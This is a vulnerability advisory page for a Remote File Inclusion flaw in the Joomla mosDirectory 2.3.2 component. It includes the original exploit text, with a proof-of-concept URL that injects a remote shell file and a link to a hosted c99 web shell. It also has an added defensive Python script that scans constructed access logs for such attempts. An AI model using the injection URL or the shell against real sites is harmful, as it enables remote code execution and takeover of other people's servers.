Vendor: mosDirectory
By: ShockShadow - Electronic Security Team
CVSS: 7.5 (HIGH)
Vulnerability type: Remote File Inclusion
CWE: 94
Product Name: mosDirectory
Affected Version From: 2.3.2002
Affected Version To: 2.3.2002
Patch Exists: NO
Related CWE:
CPE: a:joomla:mosdirectory:2.3.2
Metasploit:
Other Scripts:
Platforms Tested:
2007

Joomla Component mosDirectory 2.3.2 Remote File Inclusion

The Joomla Component mosDirectory 2.3.2 is vulnerable to Remote File Inclusion. An attacker can exploit this vulnerability to include a remote file and execute arbitrary code on the target system.

Mitigation:

Update to a patched version of the software or apply appropriate security measures to prevent unauthorized file inclusion.
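
With no patch listed, one practical measure is to watch web server logs for requests that set the mosConfig_absolute_path parameter from the PoC to a URL or stream wrapper. The script below is an added example, not part of the original advisory; the function names are hypothetical, the log lines and example.invalid hosts are constructed, and the common/combined access log format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter named in the advisory's PoC: bare form and GLOBALS[...] form.
PARAM = re.compile(r"^(?:GLOBALS\[)?mosConfig_absolute_path\]?$", re.I)
# A legitimate value is a local filesystem path, never a URL or stream wrapper.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|data:|//)", re.I)
# Request line inside a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Dec/2007:10:00:00 +0000] '
    '"GET /joomla/index.php?option=com_directory HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Dec/2007:10:00:03 +0000] '
    '"GET /joomla/com_directory/modules/mod_pxt_latest.php'
    '?GLOBALS[mosConfig_absolute_path]=http://example.invalid/x.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [24/Dec/2007:10:00:09 +0000] '
    '"GET /joomla/com_directory/modules/mod_pxt_latest.php'
    '?GLOBALS%5BmosConfig_absolute_path%5D=ftp%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 0',
    '203.0.113.9 - - [24/Dec/2007:10:01:00 +0000] '
    '"GET /joomla/index.php?mosConfig_absolute_path=/var/www/joomla HTTP/1.1" 200 5120',
]

def suspicious_params(target):
    """Return (name, value) pairs in a request target that match the RFI pattern."""
    query = urlsplit(target).query
    # parse_qsl percent-decodes once, the same as the server does, so
    # %5B/%5D-encoded brackets and %3A%2F%2F-encoded schemes are still caught.
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if PARAM.match(name) and REMOTE.match(value)]

def scan(lines):
    """Return (line_number, client_ip, hits) for every flagged log line."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group(1))
        if hits:
            findings.append((lineno, line.split(" ", 1)[0], hits))
    return findings

if __name__ == "__main__":
    for lineno, client, hits in scan(SAMPLE_LOG):
        print(f"line {lineno}: {client} -> {hits}")
```

The last sample line overrides the parameter with a local path and is not flagged as remote inclusion; any external attempt to set this variable is still worth reviewing.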

Exploit-DB raw data:

--==+=================== Electronic Security Team (www.Yee7.com) =================+==--
--==+          Joomla Component mosDirectory 2.3.2 Remote File Inclusion          +==--
--==+=============================================================================+==--

Software:     Joomla Component mosDirectory 2.3.2
exploit:      Remote File Inclusion [High Risk]
By:           ShockShadow - Electronic Security Team (www.Yee7.com)
Home:         www.Yee7.com
Download:     http://www.box.net/shared/kdp2h6dbe1
txtShell:     http://yee7.com/shells/c99.txt

##############################

==============
Dork: priv8 ;)

PoC:
http://domain.com/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://shell.txt?
###############################

by: ShockShadow
Thanks to: ArabHacker, Alyahmom, Trojan, Alakrb Almoftres, Qanas Alyahood, Kates-Ye
AND ALL Yee7.com members

# milw0rm.com [2007-12-24]